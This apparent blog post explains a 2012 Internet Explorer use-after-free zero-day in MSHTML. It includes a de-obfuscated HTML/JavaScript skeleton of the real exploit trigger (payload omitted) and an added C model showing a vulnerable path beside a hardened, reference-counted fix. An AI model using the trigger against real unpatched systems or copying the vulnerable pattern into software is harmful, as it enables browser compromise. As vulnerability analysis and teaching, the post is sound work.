According to Computerworld, attackers have begun exploiting a new zero-day vulnerability in Microsoft’s Internet Explorer web browser. The vulnerability lets an attacker take control of a Windows PC whose user browses to a malicious or compromised website. It can be exploited in IE 7, IE 8 and IE 9 (but not IE 10), on Windows XP, Vista and Windows 7; Windows 8 is unaffected. Computerworld reported that the exploit was found by a frequent contributor to the Metasploit framework:
“Frequent Metasploit contributor Eric Romang stumbled upon the IE exploit when he probed one of the servers he claimed was operated by the “Nitro” hacker gang, which used a zero-day in Oracle’s Java to compromise PCs last month.”
I will update this page as new details are discovered. UPDATE (9/18/12): Microsoft issued a security advisory confirming the in-the-wild exploit and is working on a fix. The bug will be rated “critical”, Microsoft’s highest severity rating.
“Until a patch is available, Microsoft recommended that users block attacks with EMET 3.0 (Exploit Mitigation Experience Toolkit), boosting IE’s security zone settings to “high,” and configuring the browser to display a warning before executing scripts.”
How the hack works
The exploit relies on an unpatched bug in MSHTML, the Internet Explorer component that parses HTML and CSS and renders the page.
The page calls execCommand("selectAll") on load and installs an onselect handler, which fires while that command is still executing. The handler begins with a document.write("X") statement; that call tears down the document and frees an object the still-running command is using. The handler’s next statement assigns attacker-controlled data to an element in the parent page, and that allocation lands in the memory just freed. When the command resumes it reads attacker-controlled bytes where it expects its own object, a classic use-after-free.
The exploit seen in the wild wraps this logic in additional obfuscation.
A de-obfuscated skeleton of the exploit code (payload omitted):
Contents of parent page
Create the element whose src property will later be assigned the attacker’s data (despite the name, arrr ends up holding an <img> element, not an array):
// The array is created and immediately replaced by an <img> element.
var arrr = new Array();
arrr = window.document.createElement("img");
// Harmless initial value; the iframe overwrites it during the exploit.
arrr["src"] = "L";
Contents of <iframe> page
On load, programmatically select all text with execCommand("selectAll"). The onselect handler fires while that command is still running, tears the document down with document.write() and then writes the attacker’s data into the parent’s img src, reclaiming the freed memory:
<script>
// Runs on load: starts the editing command that the handler will interrupt.
function funcSelectAll() { document.execCommand("selectAll"); }
// Runs from onselect while selectAll is still executing.
function funcOverwriteMemory() {
  document.write("X");                    // frees the object the command is still using
  parent.arrr.src = "EXPLOIT CODE HERE";  // attacker data reclaims the freed memory
}
</script>
<body onload='funcSelectAll();' onselect='funcOverwriteMemory()'>
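To make the sequence above concrete, here is an added C model of the use-after-free pattern. It is not code from the original post, from IE, or from the real exploit: the single-slot allocator, the EditCommand layout, the Document type, the 0x41 marker bytes and every function name are invented for the demo. A command object is freed by a script callback that runs in the middle of the command (the onselect handler’s document.write), the freed slot is immediately refilled with attacker bytes (the assignment to parent.arrr.src), and the command then reads through its stale pointer. The hardened variant shows the usual fix: the command takes its own reference for the duration of the callback, so the object cannot die under it.

```c
/* Added demo of a callback-driven use-after-free; allocator, types and
 * names are all hypothetical, not taken from MSHTML or the exploit. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Toy single-slot heap: a free followed by a same-size allocation always
 * returns the same address, making the reclaim deterministic. */
#define SLOT_SIZE 64
static _Alignas(max_align_t) unsigned char g_slot[SLOT_SIZE];
static bool g_slot_in_use;

static void toy_reset(void) { g_slot_in_use = false; }
static void *toy_alloc(size_t n) {
    if (g_slot_in_use || n > SLOT_SIZE) return NULL;
    g_slot_in_use = true;
    memset(g_slot, 0, SLOT_SIZE);
    return g_slot;
}
static void toy_free(void *p) { if (p == g_slot) g_slot_in_use = false; }

/* Stand-in for the editing command: a function pointer (think vtable entry)
 * followed by state. refcount records who is keeping the object alive. */
typedef struct EditCommand EditCommand;
typedef int (*finish_fn)(const EditCommand *);
struct EditCommand { finish_fn finish; int refcount; int selected_chars; };

static int finish_select_all(const EditCommand *c) { return c->selected_chars; }

typedef struct { EditCommand *editor; } Document;   /* owns one reference */
typedef void (*select_handler)(Document *);

static Document document_open(void) {
    EditCommand *c = toy_alloc(sizeof *c);
    c->finish = finish_select_all;
    c->refcount = 1;
    return (Document){ .editor = c };
}

/* Owner drops its reference; the object dies only when nobody else holds one. */
static void document_write(Document *doc) {
    EditCommand *c = doc->editor;
    doc->editor = NULL;
    if (c && --c->refcount == 0) toy_free(c);
}

/* Plays the iframe's onselect handler: document.write("X") tears the editor
 * down, then the parent.arrr.src assignment allocates attacker data of a size
 * that lands in the hole just opened (if the hole exists). */
static void malicious_onselect(Document *doc) {
    document_write(doc);
    unsigned char *spray = toy_alloc(sizeof(EditCommand));
    if (spray) memset(spray, 0x41, sizeof(EditCommand));   /* 0x41: demo marker */
}

/* Value the stale "vtable" read yields when the reclaim succeeded. */
uintptr_t attacker_marker(void) {
    uintptr_t m; memset(&m, 0x41, sizeof m); return m;
}

/* VULNERABLE: keeps a raw pointer across the callback and uses it afterwards. */
uintptr_t exec_select_all_vulnerable(Document *doc, select_handler onselect) {
    EditCommand *cmd = doc->editor;
    cmd->selected_chars = 42;
    onselect(doc);                       /* script may destroy cmd here */
    return (uintptr_t)cmd->finish;       /* use after free: reads the spray */
}

/* HARDENED: takes its own reference so the callback cannot free the object. */
uintptr_t exec_select_all_hardened(Document *doc, select_handler onselect) {
    EditCommand *cmd = doc->editor;
    cmd->refcount++;
    cmd->selected_chars = 42;
    onselect(doc);                       /* document_write only drops to 1 */
    uintptr_t target = (uintptr_t)cmd->finish;   /* still finish_select_all */
    if (--cmd->refcount == 0) toy_free(cmd);
    return target;
}

uintptr_t run_vulnerable(void) {
    toy_reset();
    Document d = document_open();
    return exec_select_all_vulnerable(&d, malicious_onselect);
}
uintptr_t run_hardened(void) {
    toy_reset();
    Document d = document_open();
    return exec_select_all_hardened(&d, malicious_onselect);
}
uintptr_t real_finish_address(void) { return (uintptr_t)finish_select_all; }

int main(void) {
    printf("vulnerable path would dispatch to 0x%jx (marker 0x%jx)\n",
           (uintmax_t)run_vulnerable(), (uintmax_t)attacker_marker());
    printf("hardened path dispatches to 0x%jx (finish_select_all)\n",
           (uintmax_t)run_hardened());
    return 0;
}
```

The vulnerable path returns the marker bytes the handler sprayed, which is exactly the situation an attacker wants: the value the command will treat as a code pointer is whatever was written into the reclaimed allocation. In the hardened path the handler’s allocation finds the slot still occupied, so the command’s own object survives the callback and the read is sound.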